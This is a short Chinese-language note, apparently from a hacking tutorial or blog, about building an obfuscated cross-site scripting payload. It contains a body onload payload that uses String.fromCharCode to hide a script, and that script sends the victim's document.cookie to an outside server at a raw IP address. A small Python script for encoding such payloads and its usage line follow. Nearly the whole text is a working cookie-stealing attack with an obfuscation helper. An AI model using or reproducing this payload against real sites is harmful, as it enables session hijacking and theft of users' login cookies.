1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| <body οnlοad=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,49,48,49,46,51,55,46,50,49,48,46,50,51,54,58,56,48,56,48,47,88,83,83,46,112,104,112,63,99,111,111,107,105,101,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,60,47,115,99,114,105,112,116,62));></body> String.fromCharCode(...)中的就是<script>document.location.href='http://101.37.210.236:8080/XSS.php?cookie='+document.cookie</script>
字符串转ascii脚本 import sys input_str=sys.argv[1] ascii_ta=[] for x in input_str: ascii_ta.append(str(ord(x))) result=','.join(ascii_ta) print("转换后的ascii码字符:") print(result)
格式: python str2ascii.py "<script>document.location.href= 'http://101.37.210.236:8080/XSS.php?cookie='+document.cookie</script>"
|